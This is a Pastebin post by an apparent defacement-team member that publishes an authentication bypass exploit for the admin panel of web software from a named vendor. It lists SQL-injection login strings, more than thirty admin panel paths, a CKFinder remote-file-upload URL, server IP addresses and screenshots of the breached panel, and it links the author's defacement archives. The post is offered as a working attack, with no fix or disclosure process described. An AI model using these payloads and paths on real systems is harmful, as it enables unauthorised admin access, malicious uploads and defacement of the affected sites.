KingSkrupellos

Ayan Advisory Private Limited Authentication Bypass

May 28th, 2020
160
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.67 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Ayan Advisory Private Limited Authentication Bypass
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28 May 2020
  7. # Vendor Homepage : ayanonline.com
  8. tr.linkedin.com/company/ayan-advisory-private-limited
  9. facebook.com/pages/category/Software-Company/ayanadvisorypvtltd/about/
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  14. CAPEC-115 [ Authentication Bypass ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  18. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  19. zone-h.org/archive/notifier=CyBeRiZM
  20. # Mirror-H : mirror-h.org/search/hacker/948/
  21. mirror-h.org/search/hacker/94/
  22. mirror-h.org/search/hacker/1826/
  23. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  24. defacer.id/archive/team/Cyberizm-Org
  25. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  26. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  27. aljyyosh.org/hacker.php?id=Cyberizm.Org
  28. aljyyosh.org/hacker.php?id=Cyberizm
  29. # Zone-D : zone-d.org/attacker/id/69
  30. # Pastebin : pastebin.com/u/KingSkrupellos
  31. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  32.  
  33. ####################################################################
  34.  
  35. # Impact :
  36. ***********
  37. CWE-287 [ Improper Authentication ]
  38. ************************************
  39. Authentication is any process by which a system verifies the identity of a user who wishes
  40. to access it.When an actor claims to have a given identity, the software does not
  41. prove or insufficiently proves that the claim is correct. Improper authentication
  42. occurs when an application improperly verifies the identity of a user.
  43. A software incorrectly validates user's login information and as a result, an attacker can
  44. gain certain privileges within the application or disclose sensitive information that allows
  45. them to access sensitive data and provoke arbitrary code execution.
  46. The weakness is introduced during Architecture and Design, Implementation stages.
  47.  
  48. CAPEC-115 [ Authentication Bypass ]
  49. *************************************
  50. An attacker gains access to application, service, or device with the privileges
  51. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  52. The attacker is therefore able to access protected data without authentication ever having taken place.
  53. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  54. through an authentication procedure. This is usually the result of the attacker using an unexpected
  55. access procedure that does not go through the proper checkpoints where authentication should occur.
  56. For example, a web site might assume that all users will click through a given link in order to get to
  57. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  58. able to reach secured web content by explicitly entering the path to the content rather than clicking
  59. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  60. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  61. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  62.  
  63. ####################################################################
  64.  
  65. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
  66. ******************************************************************************
  67. Administrator Username : '=''or'
  68.  
  69. Administrator Password : '=''or'
  70.  
  71. Administrator Username : anything' OR 'x'='x
  72.  
  73. Administrator Username : anything' OR 'x'='x
  74.  
  75. Administrator Username : x' or 1=1 or 'x'='y
  76.  
  77. Administrator Password : x' or 1=1 or 'x'='y
  78.  
  79. /bsing-admin/home.php
  80. /bsing-admin/content-management-home.php
  81. /bsing-admin/content-page.php
  82. /bsing-admin/content-page-add.php
  83. /bsing-admin/gallery.php
  84. /bsing-admin/gallery-add.php
  85. /bsing-admin/offer.php
  86. /bsing-admin/offer-add.php
  87. /bsing-admin/product.php
  88. /bsing-admin/product-add.php
  89. /bsing-admin/review.php
  90. /bsing-admin/review-add.php
  91. /bsing-admin/category.php
  92. /bsing-admin/category-add.php
  93. /bsing-admin/subcategory.php
  94. /bsing-admin/subcategory-add.php
  95. /bsing-admin/brand.php
  96. /bsing-admin/brand-add.php
  97. /bsing-admin/tag.php
  98. /bsing-admin/tag-add.php
  99. /bsing-admin/dealer.php
  100. /bsing-admin/dealer-add.php
  101. /bsing-admin/variation-type.php
  102. /bsing-admin/variation-type-add.php
  103. /bsing-admin/variation.php
  104. /bsing-admin/variation-add.php
  105. /bsing-admin/order.php?orderstatus=Successful
  106. /bsing-admin/pin.php
  107. /bsing-admin/pin-add.php
  108. /bsing-admin/coupon.php
  109. /bsing-admin/coupon-add.php
  110. /bsing-admin/report.php
  111. /bsing-admin/user.php
  112. /bsing-admin/stock.php
  113.  
  114. Remote File Upload Exploit :
  115. ***************************
  116. /bsing-admin/ckfinder/ckfinder.html?type=Images&CKEditor=description&CKEditorFuncNum=1&langCode=en
  117.  
  118. ScreenShot Administrator Control Panel =>
  119.  
  120. https://www.upload.ee/image/11783522/ayanadvisorypvtlimitedexploit28520.png
  121.  
  122. https://www.upload.ee/image/11783549/ayanadvisoryexploitfileupload2852020.png
  123.  
  124. https://www.upload.ee/image/11783557/ayantechnologyckfinderexploit28520.png
  125.  
  126. Reverse IP results for (199.231.188.124) - (206.72.197.130)
  127. There are 35 domains hosted on this server.
  128.  
  129. ####################################################################
  130.  
  131. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  132.  
  133. ####################################################################
Add Comment
Please, Sign In to add comment